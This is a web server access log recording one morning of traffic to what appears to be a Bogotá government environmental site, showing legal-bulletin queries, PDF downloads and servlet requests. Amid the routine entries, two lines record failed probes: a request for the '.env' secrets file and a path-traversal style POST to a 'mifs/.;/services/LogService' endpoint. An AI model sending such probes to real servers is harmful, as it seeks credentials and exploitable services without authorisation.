172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [18/Jun/2023:10:10:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [18/Jun/2023:10:10:24 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [18/Jun/2023:10:10:24 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [18/Jun/2023:10:10:24 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [18/Jun/2023:10:10:24 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [18/Jun/2023:10:10:24 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [18/Jun/2023:10:10:24 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
200.118.64.109 - - [18/Jun/2023:10:10:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:10:10:44 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2016&resuelve=honorarios HTTP/1.1" 200 3418
172.22.2.4 - - [18/Jun/2023:10:10:44 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [18/Jun/2023:10:10:44 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:10:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2016&resuelve=honorarios HTTP/1.1" 200 3418
186.28.79.210 - - [18/Jun/2023:10:10:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1030.pdf HTTP/1.1" 200 290077
186.28.79.210 - - [18/Jun/2023:10:10:52 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.28.79.210 - - [18/Jun/2023:10:10:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1030.pdf HTTP/1.1" 206 65536
186.28.79.210 - - [18/Jun/2023:10:10:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1030.pdf HTTP/1.1" 206 27933
216.245.221.92 - - [18/Jun/2023:10:11:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:10:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.159.112.226 - - [18/Jun/2023:10:11:42 -0500] "GET / HTTP/1.1" 200 4720
186.159.112.226 - - [18/Jun/2023:10:11:42 -0500] "GET /js/url.js HTTP/1.1" 404 1198
186.159.112.226 - - [18/Jun/2023:10:11:42 -0500] "GET /css/style.css HTTP/1.1" 200 3473
186.159.112.226 - - [18/Jun/2023:10:11:42 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
186.159.112.226 - - [18/Jun/2023:10:11:42 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
201.245.192.253 - - [18/Jun/2023:10:12:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:10:10:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
200.118.64.109 - - [18/Jun/2023:10:12:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.155.151.250 - - [18/Jun/2023:10:13:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.155.151.250 - - [18/Jun/2023:10:13:24 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.155.151.250 - - [18/Jun/2023:10:13:24 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
200.118.64.109 - - [18/Jun/2023:10:14:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:10:15:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [18/Jun/2023:10:15:25 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [18/Jun/2023:10:15:25 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [18/Jun/2023:10:15:25 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [18/Jun/2023:10:15:25 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [18/Jun/2023:10:15:26 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
191.95.160.114 - - [18/Jun/2023:10:15:41 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.160.114 - - [18/Jun/2023:10:15:41 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.95.160.114 - - [18/Jun/2023:10:15:41 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [18/Jun/2023:10:15:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0435&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1206
172.22.2.4 - - [18/Jun/2023:10:15:53 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [18/Jun/2023:10:16:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4359&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Jun/2023:10:16:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4359&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Jun/2023:10:16:18 -0500] "POST /BLA/boletinlegal/mifs/.;/services/LogService HTTP/1.1" 404 1158
200.118.64.109 - - [18/Jun/2023:10:16:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 1503
200.118.64.109 - - [18/Jun/2023:10:16:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:16:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:16:39 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:16:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 1988
200.118.64.109 - - [18/Jun/2023:10:16:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 45
216.245.221.92 - - [18/Jun/2023:10:16:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:16:41 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2004%20del%2023%20de%20Diciembre%20de%202016.pdf HTTP/1.1" 200 327098
200.118.64.109 - - [18/Jun/2023:10:16:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 34715
200.118.64.109 - - [18/Jun/2023:10:16:44 -0500] "GET /imagenes/listval.gif HTTP/1.1" 200 905
200.118.64.109 - - [18/Jun/2023:10:16:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 7
200.118.64.109 - - [18/Jun/2023:10:16:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 34
200.118.64.109 - - [18/Jun/2023:10:16:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:16:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:16:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 662
200.118.64.109 - - [18/Jun/2023:10:16:45 -0500] "GET /imagenes/Srch_frw.gif HTTP/1.1" 200 925
200.118.64.109 - - [18/Jun/2023:10:16:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 10
154.26.133.87 - - [18/Jun/2023:10:16:47 -0500] "GET /.env HTTP/1.1" 404 1018
154.26.133.87 - - [18/Jun/2023:10:16:49 -0500] "POST / HTTP/1.1" 200 319
200.118.64.109 - - [18/Jun/2023:10:16:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 26
200.118.64.109 - - [18/Jun/2023:10:16:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:16:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:16:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 4158
200.118.64.109 - - [18/Jun/2023:10:16:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:17:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:17:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 89
200.118.64.109 - - [18/Jun/2023:10:17:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:17:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:17:06 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 30
200.118.64.109 - - [18/Jun/2023:10:17:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:17:08 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:17:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:17:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:17:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
201.245.192.253 - - [18/Jun/2023:10:17:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
200.118.64.109 - - [18/Jun/2023:10:17:14 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [18/Jun/2023:10:17:16 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [18/Jun/2023:10:17:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [18/Jun/2023:10:17:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 126
200.118.64.109 - - [18/Jun/2023:10:17:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:17:28 -0500] "GET /reports/rwservlet/getjobid87281?server=repnomi HTTP/1.1" 200 47912
172.22.2.4 - - [18/Jun/2023:10:15:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:10:16:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58079
200.118.64.109 - - [18/Jun/2023:10:19:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:19:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:19:42 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:19:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:19:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:19:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 112
200.118.64.109 - - [18/Jun/2023:10:19:46 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:19:46 -0500] "GET /reports/rwservlet/getjobid87282?server=repnomi HTTP/1.1" 200 47537
201.245.192.253 - - [18/Jun/2023:10:20:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39254
201.245.192.253 - - [18/Jun/2023:10:20:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
200.118.64.109 - - [18/Jun/2023:10:21:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:21:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:21:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:21:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:21:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:10:21:33 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [18/Jun/2023:10:21:36 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 15
200.118.64.109 - - [18/Jun/2023:10:21:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 109
200.118.64.109 - - [18/Jun/2023:10:21:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:10:21:40 -0500] "GET /reports/rwservlet/getjobid87283?server=repnomi HTTP/1.1" 200 47912
216.245.221.92 - - [18/Jun/2023:10:21:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:10:22:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:10:21:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:10:23:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:10:22:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
66.220.149.117 - - [18/Jun/2023:10:24:38 -0500] "GET /dia-mundial-del-medio-ambiente-distrito-liberara-animales-silvestres-plantara-arboles-y-desarrollara-actividades-pedagogicas.html HTTP/1.1" 206 856
157.240.201.199 - - [18/Jun/2023:10:24:43 -0500] "GET /images/stand-secretaria-ambiente-fima.jpg HTTP/1.1" 200 42537
157.240.201.207 - - [18/Jun/2023:10:24:43 -0500] "GET /images/aire-bogota.jpeg HTTP/1.1" 200 169194
157.240.201.207 - - [18/Jun/2023:10:24:47 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
157.240.201.199 - - [18/Jun/2023:10:24:47 -0500] "GET /images/manos-reparadoras-plaza-americas-1.jpg HTTP/1.1" 200 47593
200.118.64.109 - - [18/Jun/2023:10:25:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
69.63.189.7 - - [18/Jun/2023:10:26:29 -0500] "GET /images/stand-secretaria-ambiente-fima.jpg HTTP/1.1" 200 42537
216.245.221.92 - - [18/Jun/2023:10:26:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:10:27:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
31.13.127.27 - - [18/Jun/2023:10:27:27 -0500] "GET /proyecto-avantia-con-la-union-europea-busca-especialista-en-cambio-climatico.html HTTP/1.1" 200 814
172.22.2.4 - - [18/Jun/2023:10:27:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [18/Jun/2023:10:27:29 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.80.52.205 - - [18/Jun/2023:10:27:31 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.80.52.205 - - [18/Jun/2023:10:27:33 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 497533
200.118.64.109 - - [18/Jun/2023:10:27:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:10:27:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:10:29:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
69.63.184.6 - - [18/Jun/2023:10:29:38 -0500] "GET /este-18-y-19-de-marzo-la-ciudadania-puede-participar-en-la-feria-de-servicios-ambientales-en-barrios-unidos.html HTTP/1.1" 200 1120
172.22.2.4 - - [18/Jun/2023:10:28:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54453
